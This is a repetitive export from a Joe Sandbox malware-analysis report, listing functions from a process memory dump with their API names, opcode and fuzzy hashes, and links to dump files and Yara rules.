                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strrchr
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3418686817-0
                                                                                                                                                                                                                              • Opcode ID: 29dcb17f304cd5283719f4c64df47d8bf6c848e80433758267e2924b4a3f7d6a
                                                                                                                                                                                                                              • Instruction ID: 17d92c6bbd7a48f62db93ac790d81356adbbc0192d747c6046dac665a176df6a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29dcb17f304cd5283719f4c64df47d8bf6c848e80433758267e2924b4a3f7d6a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FB1FA7260CB858AD670DB1AE4803AEB7A0F7D9B94F00412AEA9D83B59DF3DD551CF40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE484C00 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free_nolock
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2882679554-0
                                                                                                                                                                                                                              • Opcode ID: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                                                                                                                                                                                              • Instruction ID: bf9f147601608b3daa386cb870682eedcb9d6c05ef433fd545e77024856096ba
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3af2ff0c18311ab22d1fc21a707ae1a8690425f7f867d5984d1b9b90b111ee8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EE51BA76618B4A82DA60DB1AE49012E77B1F7DDB94F100632FE8D87B69DF3CE4518B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52E7D8 Relevance: 1.6, APIs: 1, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: c284fe8d349330dea63cdcafcfdba2d782854d79737cc428fa87d932a3163fca
                                                                                                                                                                                                                              • Instruction ID: 66c8402dc4764cdcedccebfacbe10ffd2a518b09621a3bc79ce446d3d2e4c19a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c284fe8d349330dea63cdcafcfdba2d782854d79737cc428fa87d932a3163fca
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5419D32A1864996EA6A8F18D66027C33A0FB757D4F140632FA8DC7691CF2EF472C751
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52E0C0 Relevance: 1.6, APIs: 1, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                                                                                                                                                                                              • Instruction ID: 23e9867b0a98b59e0c273dbf8021f4feb8529bd63b7d9f3a402ff531434972c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e89df1cee367fa0f0f46a6ac241d8f662de84c4c6795c4a8f44f9d2dcd22c84
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38317E32A0864A85E7235F95886137C3751AFB4BE0F51023BF91D833D2CF7EA4619722
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE531698 Relevance: 1.6, APIs: 1, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                                                                                                                                                                                              • Instruction ID: 0d42e65078bdf1ea2c95da21fcacf5cb0bc49a7ac2e478c447e7e6cfb974d2ca
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 577015f382c4b3755d8f64dd5a887aadd0f37ae10328c7424eed687849d3f455
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B021D732A08A4587DB618F68D55037D72A1EBA5BD4F284236F65DC76D6DF3ED8208B00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51AC60 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                                                                                                                                                                                              • Instruction ID: e7e277350fab3f0b879a36a4855521f1b4342fa52aa09c6151eef4963a9807cf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1dc9139e11363fa82b7be69403f460f39e9a84a2ce977399372339b1150ab367
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24214C32E04B458AFB128FA4C4542EC37A0EB5478CF54493AF70D82B8ADF3AD5A5CB40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51B114 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                                                                                                                                                                                              • Instruction ID: a862d1bf007af046096a2917a302725f037b31e501f08d4ffc3720fdbd3d9bdc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 023d0aab57ed6f467ea251b0bc75c069ffa40aacfcbe2261f6c8a82ef05c1b62
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F117522E0C589C1FEB19E9594203BDB650AF75BC8F54413AFA5C87686CF2FD5608741
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51B3A0 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                                                                                                                                                                                              • Instruction ID: 0d8c8eecc28338c16c599a2cb4d13466a86ac729e4d7362cb325f5f9d87f37f2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d80676324fc048e8d4e4a872a728742d6b00377b6fd520cac49514b25728106e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1C01A561A0874A80EE449F93591107DA695BF65FE4F088636FE6C97BD6CE3EE4614300
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52D534 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                                                                                                                                                                                              • Instruction ID: 041ad4e7960dd05863fbca1e6ed6ff30fb0f288adbc205fb1fb4098d37add3bf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7afefbf03386326cba4bd6de125ee669795ec973f90e0913fdea4b7710bc3827
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85119473A0DA4A85E6169F64D4602AC7760EFB07E4F904237F64D862D5CFBEE060CB10
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51AF18 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
                                                                                                                                                                                                                              • Instruction ID: 2411567b837fdab88d3f5a0c7f98884b7eaf9b27b43cf049a9e5b9c031c53e3b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c07a60661377560c6146fae524e41e5065d009a8dbb5852721a82c0868e09a53
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48018465A0998A41FA666EE5947137D32509F757F4F240332F92DC62C3DE2FE4618200
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52921C Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6DE52AB79,?,?,?,00007FF6DE51AF01,?,?,?,?,00007FF6DE5302A3), ref: 00007FF6DE529271
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                                              • Opcode ID: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                                                                                                                                                                                              • Instruction ID: 0830f235f1f7f4226e89bd8b427c716b2841dde31655b8bda927e26c0e3f2863
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ef4a8a9c81e310ef11842bcd22d7f0a9f6f10a443543fb6a607013a95f03771
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F04F54B0D64A81FE6557A554343BC32945FBABC0F085437ED0EDA7D6DD1EA4A04220
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE464600 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2335118202-0
                                                                                                                                                                                                                              • Opcode ID: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                                                                                                                                                                                              • Instruction ID: d8829c4bcb745fd8640af2ca3f710224fd16c7bf9a49e2a1787805eff2435eb1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c3e3381ad94b315d625f28b09079c4e3cf748ea191a82bd28328c692f6333f34
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C011A32A08B49C1DB20DB55E49035EB7A4FBD8BC8F500126EACD87B69DF7DC1608B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE51AF9C Relevance: 1.5, APIs: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3215553584-0
                                                                                                                                                                                                                              • Opcode ID: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                                                                                                                                                                                              • Instruction ID: d6fe4f6f52b82c7051ee80db594232be23aa74844aa836a373787b0d7120219f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ee4ea5e302c4353973c3e6e1fb43efa5bc80fb753a258f7a760c2d1a5460acc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0F0E925A0C98B45FA56BFEAA52117C3240AF713D4F645332F61DC62C7CE2FE4614701
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE455074 Relevance: 1.5, APIs: 1, Instructions: 30synchronizationCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateMutex
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1964310414-0
